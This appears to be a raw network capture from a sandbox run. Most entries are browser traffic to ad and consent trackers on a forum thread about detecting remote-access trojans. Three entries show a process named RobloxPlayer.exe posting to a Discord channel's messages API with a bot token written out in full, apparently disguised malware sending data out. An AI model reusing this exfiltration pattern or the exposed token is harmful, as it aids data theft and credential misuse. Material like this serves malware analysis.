GET /?log=%7B%22accountId%22%3A%224rCU9BwHgu6h5%22%2C%22domain%22%3A%22www.se7ensins.com%22%2C%22publisher%22%3A%22Se7enSins%22%2C%22cmpId%22%3A10%2C%22cmpVersion%22%3A%222.53%22%2C%22displayType%22%3A%22tcfui%3Amandatory%22%2C%22configurationHashCode%22%3A%22UuhOy8%2B9eY8AWn3z6h8Evg%22%2C%22tagVersion%22%3A%22V2%22%2C%22gvlVersion%22%3A2%2C%22clientTimestamp%22%3A1716689173228%2C%22operationType%22%3A%22init%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D HTTP/2.0
host: api.cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json, text/plain, */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:15 GMT
content-type: text/plain; charset=utf-8
content-length: 2
access-control-allow-origin: *
GET

https://api.cmp.inmobi.com/?log=%7B%22userEvents%22%3A%5B%7B%22clientTimestamp%22%3A1716689173228%2C%22event%22%3A%22startOnPage%3AGDPR_0%22%7D%2C%7B%22clientTimestamp%22%3A1716689179610%2C%22event%22%3A%22acceptAll%3Aclick%22%7D%5D%2C%22acceptanceState%22%3A%22All%22%2C%22objectionState%22%3A%22None%22%2C%22tcData%22%3A%22CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%22%2C%22nonIabConsentData%22%3A%22%22%2C%22clientTimestamp%22%3A1716689179610%2C%22operationType%22%3A%22done%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D

firefox.exe

Remote address:

3.120.230.251:443

Request

GET /?log=%7B%22userEvents%22%3A%5B%7B%22clientTimestamp%22%3A1716689173228%2C%22event%22%3A%22startOnPage%3AGDPR_0%22%7D%2C%7B%22clientTimestamp%22%3A1716689179610%2C%22event%22%3A%22acceptAll%3Aclick%22%7D%5D%2C%22acceptanceState%22%3A%22All%22%2C%22objectionState%22%3A%22None%22%2C%22tcData%22%3A%22CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%22%2C%22nonIabConsentData%22%3A%22%22%2C%22clientTimestamp%22%3A1716689179610%2C%22operationType%22%3A%22done%22%2C%22sessionId%22%3A%22GDPR-dr6v5hxjvgca2i21gkwd%22%7D HTTP/2.0
host: api.cmp.inmobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: application/json, text/plain, */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:21 GMT
content-type: text/plain; charset=utf-8
content-length: 2
access-control-allow-origin: *
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:16 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=88bf7cbc1b0411ef94a15a359d908d37; Expires=Fri, 25-May-2029 02:06:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689176.847
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmiOdW7K%2FVgNjqwDvavIcJXfnK09xQQsXl%2B18jUgnuvB9SgEcF%2BgdtHgLzSDrFOkNjUzwdWctUll7ZLsEa%2F85Tw%2FEZcrM7UXhyGKBwsurHfdhmT503%2FmqmICrxmc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=88bf7cbc1b0411ef94a15a359d908d37ed35ca2649f1f9dd73e1de125483e444f06ef9b008be9e95797997001a042bee; Expires=Fri, 25-May-2029 02:06:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=b472d740eb3236d7edd8564d6585c193b498b29a-1716689176; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=sQovP_zPoWIkjVKMEZ6uqNBzfTr3EVZFRUcFjbRL63o-1716689176030-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a347439cc889d-LHR
OPTIONS

https://optimise.net/?k=0&d=se7ensins.com&t=desktop

firefox.exe

Remote address:

34.111.152.239:443

Request

OPTIONS /?k=0&d=se7ensins.com&t=desktop HTTP/2.0
host: optimise.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: x-api-key
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

api.floors.dev

firefox.exe

Remote address:

8.8.8.8:53

Request

api.floors.dev

IN A

Response

api.floors.dev

IN A

34.160.128.112
DNS

api.floors.dev

firefox.exe

Remote address:

8.8.8.8:53

Request

api.floors.dev

IN A

Response

api.floors.dev

IN A

34.160.128.112
DNS

securepubads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

securepubads.g.doubleclick.net

IN A

Response

securepubads.g.doubleclick.net

IN A

142.250.200.34
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:16 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=88f6bbdc1b0411ef9f9476e3691ccf6b; Expires=Fri, 25-May-2029 02:06:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689177.842
x-ratelimit-reset-after: 1.539
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QtP0JxpuD35yykt18Y%2BQN4Z6B36bTD24RrE7BriCH5nPcPwvQEl5EoOk0FP1lZtQp1i7%2Bf229%2BoQmTF6NCamh1GUER9spkyJ0VZwbu2tmP095LpX9v10%2FccyBOVa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=88f6bbdc1b0411ef9f9476e3691ccf6b6fb7b9a5f497d5cd18016397142485ad2ba1b11c2150d98a6ca702fe391e18e6; Expires=Fri, 25-May-2029 02:06:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=b472d740eb3236d7edd8564d6585c193b498b29a-1716689176; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CpYOj4WXkRbWVc.TrbZdQMP5Tloug65AohJRnjS2RC4-1716689176390-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34772a1379c3-LHR
DNS

api.floors.dev

firefox.exe

Remote address:

8.8.8.8:53

Request

api.floors.dev

IN AAAA

Response
DNS

securepubads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

securepubads.g.doubleclick.net

IN A

Response

securepubads.g.doubleclick.net

IN A

142.250.200.34
OPTIONS

https://api.floors.dev/sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0

firefox.exe

Remote address:

34.160.128.112:443

Request

OPTIONS /sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0 HTTP/2.0
host: api.floors.dev
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: x-api-key
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
GET

https://api.floors.dev/sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0

firefox.exe

Remote address:

34.160.128.112:443

Request

GET /sgw/v1/floors?d=se7ensins.com&t=desktop&k=0&r=0 HTTP/2.0
host: api.floors.dev
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
x-api-key: 4e799501-b8b6-4ef1-bad5-225b3dd1aa8d
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

securepubads.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

securepubads.g.doubleclick.net

IN AAAA

Response

securepubads.g.doubleclick.net

IN AAAA

2a00:1450:4009:823::2002
DNS

251.230.120.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

251.230.120.3.in-addr.arpa

IN PTR

Response

251.230.120.3.in-addr.arpa

IN PTR

ec2-3-120-230-251eu-central-1compute amazonawscom
GET

https://securepubads.g.doubleclick.net/tag/js/gpt.js

firefox.exe

Remote address:

142.250.200.34:443

Request

GET /tag/js/gpt.js HTTP/2.0
host: securepubads.g.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

112.128.160.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

112.128.160.34.in-addr.arpa

IN PTR

Response

112.128.160.34.in-addr.arpa

IN PTR

11212816034bcgoogleusercontentcom
DNS

34.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.200.250.142.in-addr.arpa

IN PTR

Response

34.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f21e100net
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:19 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=8abebb681b0411ef80f64a55c5da46b6; Expires=Fri, 25-May-2029 02:06:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689180.159
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oXvhMeIWXk0a5Y2IXvN7uJN61KQ58sMMixkaL1PKZoj2RKhz8QvkSxXdef1VF%2FpPen7C4mJkpO%2BX4n1UGN6lGKaP8fGavLtEoK79gthWlaOZvSDVjqb4GxHczu0X"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8abebb681b0411ef80f64a55c5da46b6c03762cb24ae5eeb3a9110ffe413cfe78a48ea732304f2293006073e2a358cf1; Expires=Fri, 25-May-2029 02:06:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=a8cbe132af97d55d8da66f4a3b256573b5a3543e-1716689179; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=LkFizQggModiXo7fxZwrc2Kx6N9isrFh2Rr_9JYX3XQ-1716689179380-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34890a927797-LHR
DNS

sb.scorecardresearch.com

firefox.exe

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN A

Response

sb.scorecardresearch.com

IN A

3.162.140.91

sb.scorecardresearch.com

IN A

3.162.140.41

sb.scorecardresearch.com

IN A

3.162.140.66

sb.scorecardresearch.com

IN A

3.162.140.47
DNS

sb.scorecardresearch.com

firefox.exe

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN A

Response

sb.scorecardresearch.com

IN A

3.162.140.91

sb.scorecardresearch.com

IN A

3.162.140.41

sb.scorecardresearch.com

IN A

3.162.140.66

sb.scorecardresearch.com

IN A

3.162.140.47
DNS

pixel.quantserve.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pixel.quantserve.com

IN A

Response

pixel.quantserve.com

IN CNAME

global.px.quantserve.com

global.px.quantserve.com

IN A

91.228.74.159

global.px.quantserve.com

IN A

91.228.74.166

global.px.quantserve.com

IN A

91.228.74.244

global.px.quantserve.com

IN A

91.228.74.200
DNS

sb.scorecardresearch.com

firefox.exe

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN AAAA

Response
DNS

api.rlcdn.com

firefox.exe

Remote address:

8.8.8.8:53

Request

api.rlcdn.com

IN AAAA

Response
GET

https://sb.scorecardresearch.com/beacon.js

firefox.exe

Remote address:

3.162.140.91:443

Request

GET /beacon.js HTTP/2.0
host: sb.scorecardresearch.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript
last-modified: Fri, 03 May 2024 13:20:45 GMT
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
date: Sat, 25 May 2024 23:47:25 GMT
cache-control: max-age=86400
etag: W/"a06e7a176f40dc26aa5e9567ac9d2d5e"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 dafe1f5a40dcdd616ee93615ed1bce22.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: gTmE8vG0IxZkzh9eFeflMplzRitkMUlPVr0pjZAfy-49zLL5VzRMgQ==
age: 8337
GET

https://sb.scorecardresearch.com/b?c1=2&c2=23384447&cs_it=b9&cv=4.0.0%2B2301240627&ns__t=1716689180476&ns_c=UTF-8&gdpr=1&gdpr_p1t=0&gdpr_li=0&gdpr_purps=1%2C7%2C8%2C9%2C10&gdpr_pcc=US&cs_cmp_nc=0&cs_cmp_id=10&cs_cmp_sv=53&cs_cmp_rt=8&c7=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&c8=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&c9=https%3A%2F%2Fwww.google.com%2F

firefox.exe

Remote address:

3.162.140.91:443

Request

GET /b?c1=2&c2=23384447&cs_it=b9&cv=4.0.0%2B2301240627&ns__t=1716689180476&ns_c=UTF-8&gdpr=1&gdpr_p1t=0&gdpr_li=0&gdpr_purps=1%2C7%2C8%2C9%2C10&gdpr_pcc=US&cs_cmp_nc=0&cs_cmp_id=10&cs_cmp_sv=53&cs_cmp_rt=8&c7=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&c8=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&c9=https%3A%2F%2Fwww.google.com%2F HTTP/2.0
host: sb.scorecardresearch.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:06:22 GMT
set-cookie: UID=1B1c70bc85f7b1eeb0efffe1716689182; domain=.scorecardresearch.com; path=/; max-age=62208000
accept-ch: UA, Platform, Arch, Model, Mobile
x-cache: Miss from cloudfront
via: 1.1 dafe1f5a40dcdd616ee93615ed1bce22.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: XAluEjhQmzjzPewpbzS-Hp5SuOdql3LhBfnTZTtoyNvJkbA6TZRDuw==
DNS

cdn.confiant-integrations.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.confiant-integrations.net

IN A

Response

cdn.confiant-integrations.net

IN A

104.18.43.90

cdn.confiant-integrations.net

IN A

172.64.144.166
DNS

freestar-io.videoplayerhub.com

firefox.exe

Remote address:

8.8.8.8:53

Request

freestar-io.videoplayerhub.com

IN A

Response

freestar-io.videoplayerhub.com

IN A

104.26.9.50

freestar-io.videoplayerhub.com

IN A

104.26.8.50

freestar-io.videoplayerhub.com

IN A

172.67.74.207
DNS

cdn.confiant-integrations.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.confiant-integrations.net

IN A

Response

cdn.confiant-integrations.net

IN A

104.18.43.90

cdn.confiant-integrations.net

IN A

172.64.144.166
DNS

freestar-io.videoplayerhub.com

firefox.exe

Remote address:

8.8.8.8:53

Request

freestar-io.videoplayerhub.com

IN A

Response

freestar-io.videoplayerhub.com

IN A

104.26.9.50

freestar-io.videoplayerhub.com

IN A

104.26.8.50

freestar-io.videoplayerhub.com

IN A

172.67.74.207
DNS

c.amazon-adsystem.com

firefox.exe

Remote address:

8.8.8.8:53

Request

c.amazon-adsystem.com

IN A

Response

c.amazon-adsystem.com

IN CNAME

d1ykf07e75w7ss.cloudfront.net

d1ykf07e75w7ss.cloudfront.net

IN A

3.162.142.187
DNS

cdn.hadronid.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.hadronid.net

IN A

Response

cdn.hadronid.net

IN A

104.22.53.173

cdn.hadronid.net

IN A

172.67.36.110

cdn.hadronid.net

IN A

104.22.52.173
DNS

cdn.confiant-integrations.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.confiant-integrations.net

IN AAAA

Response

cdn.confiant-integrations.net

IN AAAA

2606:4700:4400::6812:2b5a

cdn.confiant-integrations.net

IN AAAA

2606:4700:4400::ac40:90a6
DNS

freestar-io.videoplayerhub.com

firefox.exe

Remote address:

8.8.8.8:53

Request

freestar-io.videoplayerhub.com

IN AAAA

Response

freestar-io.videoplayerhub.com

IN AAAA

2606:4700:20::ac43:4acf

freestar-io.videoplayerhub.com

IN AAAA

2606:4700:20::681a:832

freestar-io.videoplayerhub.com

IN AAAA

2606:4700:20::681a:932
DNS

d1ykf07e75w7ss.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d1ykf07e75w7ss.cloudfront.net

IN A

Response

d1ykf07e75w7ss.cloudfront.net

IN A

3.162.142.187
DNS

cdn.hadronid.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.hadronid.net

IN A

Response

cdn.hadronid.net

IN A

104.22.52.173

cdn.hadronid.net

IN A

172.67.36.110

cdn.hadronid.net

IN A

104.22.53.173
DNS

cdn.hadronid.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.hadronid.net

IN AAAA

Response

cdn.hadronid.net

IN AAAA

2606:4700:10::6816:34ad

cdn.hadronid.net

IN AAAA

2606:4700:10::ac43:246e

cdn.hadronid.net

IN AAAA

2606:4700:10::6816:35ad
DNS

d1ykf07e75w7ss.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d1ykf07e75w7ss.cloudfront.net

IN AAAA

Response
GET

https://cdn.confiant-integrations.net/qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js

firefox.exe

Remote address:

104.18.43.90:443

Request

GET /qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js HTTP/2.0
host: cdn.confiant-integrations.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:22 GMT
content-type: text/javascript
content-length: 21210
x-amz-id-2: ADGnUnkUIB9oFg4DndjhIldKGse3YAJGZsObNGDR5CJ8SPSzuut9KY93ZMZ5MBa42HZlOg5BGd7XHtkmtxQrkw==
x-amz-request-id: GEGFY9Z115HGSEPE
last-modified: Sun, 26 May 2024 01:44:31 GMT
etag: "8a1e8e845c372e0bef656e8862d05166"
x-amz-server-side-encryption: AES256
cache-control: public, max-age=900, stale-while-revalidate=3600
content-encoding: gzip
cf-cache-status: HIT
age: 606
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a349b8b526541-LHR
alt-svc: h3=":443"; ma=86400
GET

https://freestar-io.videoplayerhub.com/gallery.js

firefox.exe

Remote address:

104.26.9.50:443

Request

GET /gallery.js HTTP/2.0
host: freestar-io.videoplayerhub.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 301

date: Sun, 26 May 2024 02:06:22 GMT
content-type: text/html
content-length: 167
location: https://btloader.com/tag?h=freestar-io&upapi=true
